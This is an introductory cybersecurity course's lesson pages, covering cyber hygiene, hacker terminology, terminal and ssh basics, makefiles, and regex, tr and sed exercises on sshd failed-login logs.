Cybersecurity

2026-01-27

2026-01-27T12:00:00+00:00

2026-01-27

1. Expectations and Prior Knowledge

Language Familiarity

All students are expected to be proficient in Java/Processing, and possibly other languages as well.

While you are not required to know multiple languages, it would allow you to pick the best tool for the job on a lab where you are allowed to use any language you choose.

It is very useful to know python in addition to a more strongly typed language.

Terminal Familiarity

I expect you all have had experience working with a terminal, and working with github. If you avoided using the terminal in the past, you have now run out of time to practice and will be required to use it going forward.

This is a good place to see some of the basic skills you will all need: https://ubuntu.com/tutorials/command-line-for-beginners#1-overview

I will go over commands and make them part of future assignments, but doing this now (when you are not swamped with other work) would make your later portions of the class go more smoothly.

You are expected to be able to use the lab machines (and hopefully your personal devices) to be able to view/edit files and more. In the lab I expect that all students would be able to create a file in a particular directory and paste/edit code fairly quickly. (e.g. Paste some code into Documents/cyber/classwork/2026-01-28/Demo.java )

Working environment

Part of this course will be making sure you are able to use a wide variety of tools. Even though some tools will be replicated in a web based sandbox, there are instances where you will need to demonstrate you can use those tools outside of the sandbox (from your personal device).

Please ensure you have a working Linux OS on your personal device.

If you have a mac or linux computer, you already have one!

Mac

To work on a Mac computer you must install Xcode from the App Store. Run the following in a terminal to install xcode command line tools: xcode-select --install

Windows

Windows users can install WSL (a linux virtual machine) on your windows computers:

https://docs.microsoft.com/en-us/windows/wsl/install

Danger! Don't be stupid.

Anything you learn in this class can be used legally on your own computers, or with any computers you get permission to use. You must never "test out that cool thing" without permission.

Crimes involving computers tend to be felonies and the prosecution has a lot of incentive to convict "hackers" regardless of the reasons or the scope of the crime.

Please think before you act, and ask for permission before you act.

What does this course cover?

cyber hygiene / keeping yourself safe
Linux/command line proficiency
- Basic commands
- Specialized command line utilities
- Regular expressions
- Conversion of data
pre-computer encryption
computer based encryption and its usage
- symmetric vs asymmetric keys
- public/private key pairs and usage
- https usage of encryption
Ethical Hacking
- Reconnaissance using various scanning tools
- Various Exploits and attack vectors
steganography
- What is it?
- Image steganography implementation and exploration using Processing (the tool).

2. What is Cybersecurity?

Cybersecurity is the practice of protecting digital data and infrastructure.

There are related security fields

e.g. information security or even just... security.

Physically securing your infrastructure is needed to protect digital things but that is beyond the scope of cybersecurity.

Why care about learning Cybersecurity?

Before going into the "what" question, let us touch upon the in-demand nature of the field.

If you enjoy things in this class there are more jobs than qualified people to take them. They are well paying jobs.

Basically: They are paying you to play with computers!^*

*if playing with computers means being passionate about learning about a highly technical field and wanting to use this knowledge to do good!

What does Cybersecurity include?

There are many categories within cybersecurity:

Application security - programs including operating system
Network and infrastructure security - including web/cloud systems
Intrusion detection
penetration testing
Digital forensics and incident response - After the fact, figure out what happened, limit damage, and prevent future incidents
Endpoint protection and mobile security - protecting end-user devices such as desktops, laptops, and mobile devices
Data governance, risk and compliance - practices to comply with government or industry rules/regulations.

These are very broad categories, penetration testing for example can be broken down further:

Physical Pen Testing - Measure the effectiveness of security procedures, training, and controls by attempting physical access to an organization.
External Pen Testing - Find vulnerabilities that can be exploited by external attackers to access infrastructure or data.
Internal Pen Testing - Determining the possible impact of an attacker getting different kinds of credentials, and the level of access required to overcome the security.
Web App Pen Testing - Find technical flaws or vulnerabilities in the web applications run by an organization
PCI Pen Testing - (Payment Card Industry) Validating security of credit card information.
Red Teaming - Simulation of a real attack using the same tactics that attackers would employ. This is a more holistic test.

This is not mentioning the myriad of tools and techniques required. Some of which such as Cryptography are huge topics that you can study for years.

HW01

1. Information

Information gathering form for the semester: (log in as your schools.nyc account) https://forms.gle/asdDCrbJbY3sYmvGA

2. Lab Access form:

https://forms.gle/5GTFpBpGsNjahxgq7

2. Familiarize yourself / Verify Your knowledge

Make sure you understand Sections: 3,4,5,6 and 8. https://ubuntu.com/tutorials/command-line-for-beginners#1-overview

go back to the top of the page

2026-01-28

2026-01-28T12:00:00+00:00

2026-01-28

Cyber Hygiene

Terminology

hacker, attacker, intruder : People who seek to exploit weakness in computer systems for their own gain.
vulnerability : Flaws in software, firmware, or hardware that can be exploited by anattacker to perform unauthorized operations on a system.

Hacking

~1950 MIT students. or 2024 Chinese/Russian government employees?

The original use of the term hacker dates back to 1950-1960s at MIT. Students there enjoyed learning about and experimenting with technology. A hack was something innovative/ingenious in the arena of computers and technology. This positive connotation exists today in expressions like "life hacks" "cooking hacks" etc.

This has evolved somewhat, and it is sometimes confusing because 'hacker' can have a positive or negative connotation: a creative engineering person, versus a cyber attacker, or even both.

Hacker Classification

Hackers can be classified into three different categories:

White Hat - Ethical Hackers. The "good guys" that use their skills to help protect against attacks / find and report vulnerabilities / design secure systems etc. They have permission to try to hack into and detect vulnerabilities. They act in an open and professional manner to differentiate themselves from malicious hackers.
Black Hat - Malicious Hackers. The "bad guys" that use their skills for malicious purposes. They can steal money and information or damage systems.
Grey Hat - They do not have permission to gain access to a company's system or products, but find exploits with the intent of highlighting the problem. (often seeking a bounty/reward for doing so, not just going after posted bug bounties) They do not have malicious intent but their actions may be illegal.

What is at risk? How can you protect yourself?

What are possible losses due to a cyber attack?

Let us consider the possible impacts of cyber attacks? Think what can happen if you don't protect digital data and infrastructure...

Financial
Resource Unavailability / Misuse
Data Loss
Identity Theft
Loss of Trust/Reputation

Identity Theft

A crime where an attacker uses information that identifies a person for personal gain.

Data At Risk:

Name, Address, Phone number,
DOB, SSN
Credit Card / Bank info
Driver's License / Passport

Effects of Identity Theft:

Loss of money: Bank / Credit card fraud
Actual Identity: Government ID or document theft/usage

What can an individual do to protect themselves?

Regularly Updating OS and applications
Change default usernames and passwords on all devices
- Strong Passwords
- Do not re-use Passwords
Use MFA (multi factor authentication)
Antivirus*
Backup of important Files
Using encryption and Digital Signatures
Firewalls and intrusion detection systems
Be suspicious of all email. Expected or otherwise
Not revealing too much personal information on social networks
Awareness of present world security scenarios and new attacks

*Regarding antivirus

Sometimes free antivirus isn't worth having. While Avast, AVG, and several other providers offer a free tier of protection, they are often filled with advertizements for the upgraded veresion of protection.

Microsoft's windows defender is a great free option, but you may want to supplement that with something for your web browsing, or for additional malware detection.

Homework02:

Optional:

Some of you would do well to try bashcrawl on your personal device. Some of you did this in another class, and we will do more advanced things later. Make sure you are able to do this. (I won't check, I will just assume you know it because you are all close enough to adults to feel the sting of consequences of your own actions or inaction) Yay consequences.

1. Your data

Back up all of your STUYCS lab data somewhere else. Your data is not protected and can be erased at any time.

If you have anything that is not in a github repository, you might want to make one to store your old work (intro etc).

Any GitHub repositories that you do not OWN (everything on GitHub classrooms), should be forked so you have a copy that you do in fact own, provided you wish to maintain it.

2. What you should you be doing now: (if you want to be safe)

The following are good practices that you should aim to do/start doing as soon as you can. There is no deadline and I won't check, but they will make you safer overall.

Update all of your software
Turn on multi factor authentication for all of your accounts that support it.
Migrate to a password manager. (Bitwarden or similar, do NOT use LastPass)
Change all of your (important) passwords to a 16+ character long randomized string using your password manager prioritizing your most important accounts and working your way down the list.
Install / Update (regularly) a reputable antivirus*

go back to the top of the page

2026-01-29

2026-01-29T12:00:00+00:00

2026-01-29

Terminal-Fu

the -fu suffix:

From: https://en.wiktionary.org/wiki/-fu

-fu : (slang) Used to form nouns indicating expertise or mastery of specified skill or area of knowledge.

Google + -fu : Google-fu
script + -fu : script-fu
My Google-fu is weak!
Aragorn uses Ranger-fu to figure out that Sam and Frodo have taken a boat.

Etymology

From kung-fu.

Some extra Resources

https://ubuntu.com/tutorials/command-line-for-beginners#1-overview

What is a terminal emulator based on? VT100 Terminal

Terminal Emulators: https://en.wikipedia.org/wiki/List_of_terminal_emulators

Terminal vs Shell

Terminal and shell are often used interchangeably much like arguments vs parameters.

The terminal (Actually a terminal emulator) is the window that connects to another machine. This is based on a physical device called a terminal.

The shell is the program running on the machine that is parsing your commands.

Common Problems

Often typing commands that you know, will cause results you do not expect.

Echo is a simple command that prints to the terminal whatever text you give it.


  $ echo hello, goodbye
  hello, goodbye
  $ echo "hello, goodbye"
  hello, goodbye
  $

But if you mistype it:


  $ echo "hello, goodbye
  >

Oh No! You are stuck!

There are several ways to fix this. One is to close your quotations, the other is to press Ctrl-C and ending the command.

Your 2nd best friend: ctrl-c

Here are some examples of commands that will make your terminal get stuck in some way:

$ echo "hello
$ grep foobar
$ yes
$ tail
$ cat

In every case, the solution is the same: hit Ctrl-C (pronounced "control-see"). Ctrl-C is sometimes written as ⌃C

Your best friend: Tab (the key above capslock)

When typing commands into the shell, many shells will allow for some form of autocompletion. The tab key triggers the auto complete functionality.

Other tools that you should know:

cd
cp and mv
scp
cat
nano / micro
ssh
If you like to suffer: vim , emacs

SSH

ssh is a secure shell program that lets you connect your terminal to a shell on a remote computer. This is used to run commands on that remote computer as if you were logged into it (because you log into it remotely).

    ssh username@hostAddress

The machines in this lab are all open to be ssh'ed using your STUYCS accounts.

Marge is 149.89.40.100 please do NOT use marge for general work.

All other machines are: 149.89.40.1xx where xx is 01,02,03,... 31,32

The command ssh username@149.89.40.100 would try to connect to marge, and ask your for your password for the cs lab.

From marge, you can ssh username@149.89.40.115 to connect to cslab4-15

Classwork Repo

Please clone and use this repo to store your day to day files and a few small assignments: https://classroom.github.com/a/ciQpWNGs

Scavenger hunt!

YOU MUST NOT CLONE THIS IN YOUR HOME DIRECTORY!!!!

You will use your last 4 digits of your osis as your random seed so you do not forget it.

You can continue your scavenger hunt on another machine because you can recreate the scavenger hunt with the same random seed as last time. You can SSH back into the lab computers, and recreate the hunt if it got deleted.

You will be logging your scavenger hunt so please read the how to submit section!

To get started:

Note which computer you are logged into. You can always ssh back here.

mkdir /tmp/`whoami`;cd /tmp/`whoami`;git clone https://github.com/pushingice/scavenger-hunt.git

Now you must read the README carefully and follow directions.

Use the last4 digits of your osis as your secret number. (random seed)
If you get lost please use: cd /tmp/`whoami`/scavenger-hunt
Try the hunt as it is intended, and when you finish it will show you a cool method you could have hacked the hunt from the start!

Do not look into the python files, or use your python-fu to get your clues as that completely circumvents the purpose of this activity.
If "which python" doesn't work as intended, try using "" as the result instead of "no python found" or similar.

Remember you can have more than one terminal open, for example one to display your information, and another to test commands.

Note that the whoami command prints your username to stdout. The backticks insert the results of that into the terminal command.

Homework00:

How to submit:

Make a file: ~/CLASSWORK_REPONAME/00/scavenger.txt that is in the 00 directory of your classwork repo.

This should be a plain text document no other file types!

The file should contain: your name, seed, and all 12 of y our clues in the format:

Period,Last,First
seed
problem#,LOCATION, explanation how did you get this location
problem#,LOCATION, explanation how did you get this location
...
explanation at the end

Your hint is exactly what you give to the nextclue command.

Problem 12 requires an explanation of how you found it.

After 12, please write an explanation of how easy/hard the hunt was for you, and if you used any alternative ways to find the solution(s)

e.g.

09,Smith,Kenji
0210  #the seed (secret number needed for your quest.)
1,README, Mr.K told me to go here...
2,50240, the command foo gave me the hint fish
3,12394, using ls and combining the results got the hint 123
4,54133, i used the sudo command to pwn all
...(more lines)
12,20042,????
It was hard until I decided to used magic! The magic of the terminal! (not a good response)

Try your best, and don't worry if you get stuck! Posting on piazza will help you un-stuck yourself.

There are ways around any commands that don't work due to permissions.

Homework03:

0. Join Piazza

You will be invited if you fill out the form from your 1st homework. If you didn't do that you can fix it...

1. Complete scavenger hunt (Due next class)

2. Perusall (Due Monday to allow people to respond to others)

Join here: https://app.perusall.com/join/KONSTANTINOVICH-DLW4V

If you do not join you will continue to acrue negative points until you do join!

Please set your name properly to be your official DOE name if it is not set.

Complete the academic dishonesty assignment You m ust annotate at least 2 times. (Your highest two meaningful comments/questions will be counted.)

go back to the top of the page

2026-01-30

2026-01-30T12:00:00+00:00

2026-01-30

Policies / Late work / etc

Class policies are on the landing page (click on the snake)

Software you need to know about

You will have to learn how to install a variety of tools. Installations are specific to your OS, but you can just follow the directions in most cases.

Windows Users:

windows 10 or 11 let you run linux in a window: WSL (Windows subsystem for linux is actually a linux subsystem for windows...)

If you don't want to use linux or you also want to install tools to use with powershell, then look into chocolatey

For linux: sudo

sudo is a program already installed on unix and linux operating systems that enables users to run programs with the security privileges of another user, by default the superuser.

You do NOT have sudo permission on the school system, but you do on your personal devices, and on your WSL installation.

Windows does not have an equivalent command.

Installing software / Updating

On your linux distributions, you often can install software with a single command in the terminal!

Prior to installing anything you should update:

update your linux first:

sudo apt update
sudo apt upgrade

Then install software you need: (cowsay is an example)

sudo apt install cowsay

grep

Regarding grep: g/re/p Globally search for a Regular Expression and Print matching lines

grep is a great filtering tool to help reduce large outputs to just the parts you care about.

Python

Both Python 2 and 3 are very useful. Some programs only exist in one version or the other, so it is always helpful to be able to use either.

Even if you do not plan on coding in python it is useful to be able to run commands in both python 2 and 3. When you install both, you must be careful which you are actually running.

Do not use the command python in your scripts/makefiles. When writing scripts you should explicitly call python2 or python3 rather than assume that python will call the correct version!

Shell configuration

You do not have to keep your shell in the default configuration.

Bash has a .bashrc file, zsh has a .zshrc file. In these files (and a few others like .bash_profile ) you can add customizations such as aliasing commands to other commands with particular arguments.

alias python="python3" would default the python command to always be python3, this would not impact your ability to use python2 or python3 commands. It would affect how your scripts are run on your computer, but NOT how it would run on soemone else's computer!
alias rm='rm -i' would make every rm command ask for confirmation before deleting.
I have a colorized cat program in ~/bin/ and I aliased cat to it as follows: alias cat='~/bin/ccat -G String="green" -G Plaintext="bold" -G Keyword="blue" -G Punctuation="red"'

VPN

We will be using openVPN for accessing some cybersecurity resources.

Make

Make is a program to easily run other programs!

make is a command that we will be using for labs. If you use windows your gitbash doesn't have this tool.

On windows you have to download Make for windows

On wsl or linux you can just run: sudo apt install build-essential

Makefiles

Make is configured to do whatever you need it to do using a file you create that is named "makefile".

This allows developers to distribute software to other developers without having to wory about complex compilation/configuration steps.

Makefile syntax

To use make, you will need to be very careful with tabs vs spaces.

Because java automatically compiles required files, and python doesn't require compilation, the dependencies do not seem important. They are in many languages, they are not used here to keep things simple.

syntax of a typical rule: (note tabs won't display as tabs in a website, so aways use 1 tab to indicate a recipe)


  .PHONY: run clean
  target: prerequisites
  <TAB>recipe
  target2: prerequisites
  <TAB>recipe2

That is the tab character (tab key), not the symbols written.

target are often FILES that the recipe will make.

Prerequesites are any FILES that are required to run the recipe.

The .PHONY commands are examples of targets that are NOT files. You should avoid making files that overlap the run commands, e.g. do not make a program called "run" if you want to use "make run" to execute that program.

Examples of makefiles:

URGENT NOTE: these examples are not copy/paste-able because websites don't display tab characters. You must ensure text is left justified or tabbed over once!

run:
 python2 file.py

A simple recipe to run a command: (you cannot copy paste this as web browsers do not use "tab" and makefiles REQUIRE tab indentation)

say_hello:
    echo "Hello World"

Now run the file by typing make inside the directory that contains the makefile. The output will be:

$ make
echo "Hello World"
Hello World
$

You can put comments at the top of your makefile. You can also make multiple targets. The first target is the "default" which is run when no arguments are provided to the make program.

# Usage:
# make        : compile all java files
# make run    : run the program
# make clean  : remove all class files
.PHONY: run clean default
default:
    javac *.java
run:
    java Driver
clean:
    rm *.class

You can pass arguments into your programs using makefile too!

# Usage:
# make run ARGS=filename
# also note the @ before echo, this will not echo the command on the terminal
# you can test it both ways to see the difference.
.PHONY: run default
default:
    @echo "example: make run ARGS=textfile.txt"
run:
    python File.py $(ARGS)

Final note on makefiles, after you test them and they work, you should add @ before each command so you do not see the command itself, only the output.

# Usage:
# make        : compile all java files
# make run    : run the program
# make clean  : remove all class files
.PHONY: run clean
run: Driver.class
    @java Driver
Driver.class: Driver.java
    @javac Driver.java
clean:
    @rm *.class

Dependencies

The above includes an example of dependency usage.

More notes on makefiles

You can find more information on makefiles here: http://konstantinnovation.github.io/systems.html#2024-09-16n

Requirements for next lab:

make
args of your program : e.g. java Driver 10 fish or python3 Driver.py 10 fish

If you don't remember command line args in java see here: https://konstantinnovation.github.io/apcs1.html#2025-11-21n

Extra stuff

Since people ask about my shell here is my customization (mostly) https://github.com/konstantinnovation/customize

go back to the top of the page

2026-02-02

2026-02-02T12:00:00+00:00

2026-02-02

It's GROUNDHOG DAY!

Lab00

This is a test lab to ensure you can use the tools required for future labs.

You must always test your labs on the StuyCS Lab computers, to avoid any compatibility issues.

https://classroom.github.com/a/uNMA5sck

The goal is to use and test a makefile

1. ALWAYS make your makefile first, and use your makefile when testing your code.
2. Create a makefile to use with your program. If you have difficulty read directions, and ask on piazza
3. create a makefile with the following targets:
4. compile : compile if needed
5. make clean : remove any compiled files
6. make run $ARGS="args go here" : compile ONLY if needed, then run the program with the arguments provided in the ARGS string.
7. Do not use @ suppression until you know your makefile works correctly, then you must add @ to the start of each command
Write a program in either java or c that does the following:
1. when the arguments are -u and a string: Uppercase a string
2. when the arguments are -l and a string: Lowercase a string

Example:

The first make will compile. The other make run commands will run your program.

$make compile
$make run ARGS="-u asdf"
ASDF
$make run ARGS="-l aSdF1"
asdf1
$

Notice no output when typing make.

Example 2: (auto compile if needed)

$make clean
$make run ARGS="-l fish FOOD"
fish food
$

The most basic makefile should have:

PHONY
clean
run (or other commands to run your program e.g. encode/decode)

The run command or encode/decode etc should have dependencies if there is a compilation step:

for c: you should have all c files compile to o files separately. Only compile what is changed. (this was done in systems)
for java: javac has built-in dependency checking for related classes within the same compilation run. You can clean as a prerequisite before you call javac, and it will be sufficient.

Don't worry about variables, or wildcards. You can read more advanced things about make here:

https://makefiletutorial.com/

go back to the top of the page

2026-02-03

2026-02-03T12:00:00+00:00

2026-02-03

Scavenger Hunt all clues

I used grep as follows:

grep -r "### Clue"

However the output was ugly so:

grep -r "### Clue" | sort -k 3n

This uses the 3rd item in each row as sorting key, and treats it like a number.

Since I still thought this was ugly...

grep -r "### Clue" | sort -k 3n | sed -E 's/(.*)\/.* Clue (.*): .*/Clue:\2 Folder:\1/'

I didn't teach you sed, but the (.*) are capturing the characters before the first slash, and the characters between "Clue " and the ":" then outputs them in a nice format

Regular expressions are very useful in pattern matching and manipulating

prerequisite terminal skills:

Opening a terminal
Creating folders and files in the location you want
Copying/Moving/Editing files
Using SSH to run commands on another computer

TTY sessions

TTY used to refer to a physicpxal TeleTYpewriter which was a machine that connected remotely but now is just refers to one of the terminals connected to the machine.

You can access tty4 (ctrl-alt-f4) and tty5 (ctrl-alt-f5) before you log in, and then you will have to log in to that tty session.

Make sure you exit your tty session before you leave the computer, as it does not lock the screen or log you out!

Nothing screams "script kiddie"* like someone using a TTY session to show off then forgetting to log out and getting their information stolen

*Look up script kiddie

Using a tty session is sometimes good practice to see how well you fare without the GUI. You OFTEN need to interact with remote computers via ssh, giving you only terminal access, so this is in fact a useful skill, not a bragging point.

cheat.sh

How to get help in a terminal assuming you have web access?

http://cheat.sh is a website that has examples of how to use linux commands in different ways. This is often more useful than man pages when you don't know how a command is used.

Accessing cheat.sh from a browser when you are in a terminal may not be ideal, so there is a quick way to get the info on your current terminal:

curl cheat.sh/COMMAND_TO_LOOK_UP

Note: curl stands for Client URL

Plumbing

The linux system has a large variety of commands that do small things. By combining these tools you can accomplish a very large variety of results.

ls lists files and directories but has many flags to make it more useful.

wc counts the number of lines, words and characters in a block of text.

sort will sort a block of text alphabetically

uniq can replace duplicate entries with a single entery, and optionally count the number of repeats

sed stream edit, lets you modify a stream like standard out in real time as it is printed.

Remember you can curl cheat.sh/COMMAND if you need some examples/hints/help

Demo From Class:

You can give a command parameters:

cowsay Moooo!

Or you can pipe | commands into another command:

fortune | cowsay

You can pipe the output of several program into eachother:

fortune | cowsay | lolcat

You can also use loops on the shell:

while true; do date '+%D %T' |
  toilet -f term -F border |
  lolcat; sleep 1; done

Homework

Regular Expressions (regex):

1. Spend 20 minutes to familiarize yourself with either regex tutorial so you get an idea of how this works before tomorrow.

https://regexlearn.com/learn/regex101

or here:

https://regexone.com/

2. Try to apply regex using this testing site: https://regex101.com/

Your goal is to try to see in realtime how the regex expression matches text

You should use ^ and $ operators for line boundaries as well.

Here is some sample text to work with, try to match ONLY the usernames, try to match ONLY the IP addresses:

You will want to use capture groups for this, so you can match parts of the whole line e.g. "(.*) sshd.*" would capture "Feb 06 10:15:28 marge" from each line in the group designated by the parenthesis.

Feb 06 10:15:28 marge sshd[1983193]: Failed password for root from 218.92.0.76 port 24168 ssh2
Feb 06 10:15:30 marge sshd[1983195]: Failed password for root from 61.177.172.160 port 18985 ssh2
Feb 06 10:15:39 marge sshd[1983202]: Failed password for invalid user min from 43.153.223.232 port 41606 ssh2
Feb 06 10:15:42 marge sshd[1983200]: Failed password for root from 61.177.172.160 port 37258 ssh2
Feb 06 10:15:49 marge sshd[1983207]: Failed password for invalid user bodega from 34.66.142.113 port 43408 ssh2
Feb 06 10:16:02 marge sshd[1983216]: Failed password for root from 180.101.88.241 port 49238 ssh2
Feb 06 10:16:02 marge sshd[1983218]: Failed password for invalid user btest from 43.163.226.99 port 50308 ssh2

Note: I absolutely need to use https://regex101.com/ to help me tweak my expressions, it is like having a compiler for a language.

go back to the top of the page

2026-02-04

2026-02-04T12:00:00+00:00

2026-02-04

Regular expressions

https://xkcd.com/208/

There are regex quick references all over the internet, but just a few things here:

^ : the start of the line
$ : the end of the line
. : any single character except newline
* : zero or more of the preceding match
+ : one or more of the preceding match
? : zero or one of the preceding match
(a|b) : either something that matches a or b
[abc] : any one character of a, b, and c
^ : can also be used inside of [] to negate the result
\b : a word boundary
\s is a shorthand for [ \t\r\n\f] which is whitespace characters (tab newline space etc.)
\S equivals to [^ \t\r\n\f] which is non-whitespace
x{n} : Where "n" is a positive integer, matches exactly "n" occurrences of the preceding item "x".
x{n,m} : Where "n" is 0 or a positive integer, "m" is a positive integer, and m > n, matches at least "n" and at most "m" occurrences of the preceding item "x".

You can use these (and more options) to find or validate strings.

Create a regex that will match some of the following words but not the rest using what you know of regex:

Two or more consecutive z's in the middle of non-z's.

--match:
wazzzzzzzup
wazzup
zwazzup
wazzzzupz
skip:
wazup
waup
aszbczasdf
zabczz
zzzzzz
zzzaaaazzz

even number of consecutive z's but not 0, in the middle of non-z's.

--match:
wazzzzzzup
wazzzzup
wazzup
zwazzzzupz
--skip:
wazup
wazuzp
wazzzup
fazzzup
fazzzuli
zzfaulizzzz

Use capture groups, not a 3 way or statement.

match:
timtim-tim
kimkim-kim
jimjim-jim
skip: all other patterned words
timtan-tim
kimtim-tim
rintin-tin
jimjim-kim
etc.

Regex realtime preview is helpful

I often use https://regex101.com/ to validate my regular expressions.

*I absolutely needed to use it when I haven't touched regex in a while, or when my expression is complicated.

Also remember you have other sites to give you some regex help:

https://regexlearn.com/learn/regex101

or here:

https://regexone.com/

What kinds of strings does the following expressions match?

  A: \bR[a-z]{4,10}e\b
  B: \bR[a-zA-Z]{4,10}[e|E]\b

Here are some test strings, decide if each string matches regex A , B or both

Reeeee
REEEEE
ReEEeE
ReEeEe
Rffffffffe
Rfefefefee
Re
REE
REeE
ReEee
Rfffe
Rffee
Reeeeed
REEEEEf
ReEEeEc
ReEeEet
Rffffffffet
Rfefefefeef

Classwork + Homework 02:

Submit in your classwork directory with the path/filename: CLASSWORK_REPONAME/02/regex.txt this should be a plain text document.

Urgent

Your homework is to show multiple expressions per question. If you just submit your answer, then you will get NO credit .

Show the evolution of your answer by including EACH expression that you went through to get to your final answer!

Put a heading on your file:

Last,First,Period
HW##,DATE

Question 1

Write a regex that checks for valid names.

You will be submitting as many expressions as you needed to built up the final answer. You do not have to inflate this quantity but it should be more than 1 for sure.

What is a valid name?

A valid name consists of the following:

first name, an optional middle name or initial, and a last name, separated by spaces.

First, middle and last names start with a capital letter and are followed by one or more lowercase letters.

If the name has a middle initial, instead of a middle name, it must be a capital letter followed by a period.

Sorry we are lumping 2 part first names or two part last names into "middle names" to simplify things. We are also not including titles like junior, senior, esquire etc.

Examples you should paste into https://regex101.com/

MATCH:
Joe Public
Xiao Xiao Mao
Joe Q. Public
Joe Quincy Public
Ferris Buler
William M. Mason
David Copperfield

DO NOT MATCH:
Joe P.
Omae wa mou shindeiru
Joe Q Public
Joe Qu. Public
Joe Quincy Reginald Public
Joe Quincy Public, the Third
Dave P.
Little Richard III

Your answer should be something like this (spaces will represent actual spaces):

 [a-z]* [a-z]* [a-z]*

To match a whole line, so that you don't get partial names, we use the ^ for the start of the line, and $ for the end of the line.

^[a-z]* [a-z]* [a-z]*$

Lets not forget some last names are hyphenated!

optional: (Hyphenated last names with upper case)

Abby Smith-Fitzgerald
Aerating A. Silver-Kimono
Joe Quincy Public-Defender

Question 2

Part a

First match IPV4 address formats, four numbers separated by periods. E.g 1.2.3.4, 192.168.1.24, etc.

Part b: keep updating your regex

Update your answer to REJECT invalid ip addresses. Each of the four numbers must be between 0 and 255. There should be NO leading zeros.

Accept: (but not limited to these)

1.1.1.1px
255.0.0.255
192.168.1.255
192.168.1.1
255.255.255.255
0.0.0.0

Reject: (fewer or greater than 4 numbers, numbers out of range, negative numbers, missing numbers, extra periods etc.)

30.168.1.255.1
127.1
192.268.1.156
192.268.-1.156
192.168.1.256
-1.2.3.4
1.1.1.01
1.1.1.1.
8.8.8..8
3...3

go back to the top of the page

2026-02-05

2026-02-05T12:00:00+00:00

2025-02-06

Quiz

Next week you will have a quiz on terminal commands and regex. I don't know which day yet, but this is a nice way to give a narrow scope of topics.

From regexlearn.com (up to 44), you need it all except for:

Non-capturing Grouping
look-ahead
look-behind
Flags

Using regex with grep

grep requires the -E (Extended) flag for full regex support, otherwise it has only a subset of what we learned. This is true for many regex compatible tools, though the flag may be different.

New useful terminal commands

tr - Translate, squeeze, and/or delete characters from standard input, writing to standard output.

-d (delete)

-s (squeeze repeats)

Let us use tr to help us do some manipulation of a text file...

replace uppercase with lowercase
replace spaces with newlines
squeeze multiple repeats into a single
delete all puinctuation

What else can we do with these tools?

cat FILENAME | tr -d '[:punct:]' | tr ' ' '\n' |
tr -s '\n' | tr "[A-Z]" "[a-z]" |
\grep  -vx -f /usr/share/dict/american-english -i

I excaped grep because of a macro, \command will make you use the command WITHOUT resolving an alias.

e.g. if you have alias rm=rm -i then \rm FILENAME will ignore the alias and not use the -i

Remember the clues from the scavenger hunt?

Look at the extra command at the end of this chain:

grep -r "### Clue" | sort -k 3n |
    sed -E 's/(.*)\/.* Clue (.*): .*/Clue:\2 Folder:\1/'

What are the parameters in between the "/" in sed?

We shall now look at sed, the strem editor.

Edit the stream:

Sed is a stream editing program. Sed has several commands, but most people only learn the substitute command: s. The substitute command changes all occurrences of the regular expression into a new value. A simple example is changing "day" in the "old" file to "night" in the "new" file:

sed s/day/night/ < oldfile  > newfile

sed s/day/night/ oldfile > newfile

cat oldfile | sed s/day/night/ > newfile

To test this:

echo day | sed s/day/night/

This will output "night".

Using with regex:

sed -E 's/target/replacement/' where -E is for extended regex.

Matching up to a specific word(or words)

Given this data file called 'words':

a fish bites
a dog barks
the dog runs
many fish fly
many fish fry
my dog sleeps

If you want to match UP TO a string or multiple strings you can do the following:

cat words | sed -E 's/^.*(dog |fish )//' will replace everything UP TO dog or fish and replace with nothing.

cat words | sed -E 's/.*(dog|fish).*/\1/' will capture the entire line and replace it with capture group 1. The \1 in the replacement field stands for capture group 1.

This effectively strips away all parts on the left and right side of the words we wanted. Now lets try to combine our regex powers...

Using this hands on:

ssh can take command line arguments!

Passing a string into ssh at the end of the line, will cause ssh to run that string on the remote host!

So ssh bob@marge.stuy.edu "cd Documents; ls" would show you the contents of the Documents folder on marge, then exit the ssh program.

Getting some ssh logs:

You need sudo for this so you can try it on your own linux devices: ssh myserver "journalctl | grep sshd" > sshlog.txt

Now filter the sshlog.txt only the disconnections, and also dump it to a local file:

I have placed /tmp/CyberSSHLog.txt on marge for you to retrieve. What commands can get the file?

Get this file now, you can use many commands, scp being the most obvious. I will frequently ask you to get files, you need this skill.

Homework

<-- STATE WHICH ASSIGNMENT, should have been passwords -->

Perusall due Monday 8am.

It will be released at the end of the day. You must come back to the assignment after others have had time to post. DO NOT wait until Sunday night/Monday morning to do the assignment, you should start tonight.

You will have another homework that overlaps, so don't procrastinate.

go back to the top of the page

2026-02-06

2026-02-06T12:00:00+00:00

2026-02-06

Is your regex weaksauce?

Protips:

Use regex101.com to help you figure out why some lines do not get matched!

Back to your ssh logs:

Here is how you get rid of everything before andincluding the "Disconnected from" in EACH LINE of the text file:

cat sshlogfile | sed 's/^.*Disconnected from //'

sed substitutions:

sed 's/a/b/' will replace a with b. To use regex add the -E flag.

multiple substitutions:

sed 's/a/b/; s/c/d' will replace a with b, and also repalce c with d. You can chain multiple substitutions like the following:

Classwork:

I have placed /tmp/CyberSSHLogs.txt and /tmp/CyberSSHLogsDirty.txt on marge for you to retrieve. What commands can get the file?

The dirty file has many accounts and many extra lines. The basic file just has root attempts.

The questions are primarily targeting the SSHLogsDirty file.

Get thes files. You can get both at once if you target "/tmp/Cyber*.txt"

I will frequently ask you to get files, you need this skill.

Where to place work:

Create a directory in your classwork repo:

You should place the ssh logs in it, and do today's work there. You can create additional files without cluttering your home directory.

This directory is for the intermediary files and scratch work you are doing: CLASSWORK_REPONAME/2026-02-06-Regex/

Filter the failed passwords

This was already done for the non-dirty file.

First we want to find any bad login attempts from invalid passwords. This can be done by grepping the error message that occurs when you give a bad password, find this in the log file then filter your data set.

You can output that into a 2nd file sshfailed.txt which should have 5651 lines in it. We don't care if the fail is for a valid or invalid account.

Now lets get the username and IP addresses.

Now try to make the regex that matches the whole line but includes CAPTURE GROUPS for the username and the IP address

The end result should be each line is replaced with "IP username"

tail sshfailed.txt | sed -E 's/REGEX/REPLACEMENT/'

Use capture Groups:

Writing \1 as a replacement will substitute the 1st capture group, \2 is the 2nd etc.

e.g.

tail sshfailed.txt | sed -E 's/^REGEX(GROUP1)REGEX(GROUP2)REGEX$/\1 \2/'

results:

49.88.112.72 root
223.68.4.237 etienne
49.88.112.72 root
49.88.112.72 root
159.89.89.127 postgres
134.209.154.246 elle

If that works: run it on the whole file, don't use tail.

Try switching the \1 and \2 or removing one.

cat sshlog.txt | sed -E 's/^.*Disconnected from (authenticating |invalid )?user (.+) ([0-9\.]+) port.*$/\2 \3/'

